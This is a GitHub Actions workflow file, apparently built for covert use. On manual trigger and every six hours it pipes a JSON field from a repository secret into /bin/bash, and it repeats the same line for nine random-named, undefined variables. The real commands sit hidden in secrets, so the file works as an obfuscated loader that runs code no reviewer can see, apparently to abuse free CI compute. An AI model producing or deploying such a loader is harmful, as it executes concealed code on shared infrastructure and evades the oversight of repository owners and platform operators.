name: crowfootpenetrate

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: crowfootpenetrate
        env:
          zx11667: ${{ secrets.zx11667 }}
        run: |
          echo $zx11667 | jq -r .dsov1 | /bin/bash
          echo $ybqh55524 | jq -r .rtc784 | /bin/bash
          echo $vsfbj7604 | jq -r .uqvsk34707 | /bin/bash
          echo $aboil5 | jq -r .haf80887 | /bin/bash
          echo $g5162 | jq -r .mho79 | /bin/bash
          echo $nbw2595 | jq -r .isxi363 | /bin/bash
          echo $mlun837 | jq -r .v8 | /bin/bash
          echo $mdq81 | jq -r .kv119 | /bin/bash
          echo $yrotm35813 | jq -r .roamk2 | /bin/bash
          echo $vys35996 | jq -r .keac33253 | /bin/bash

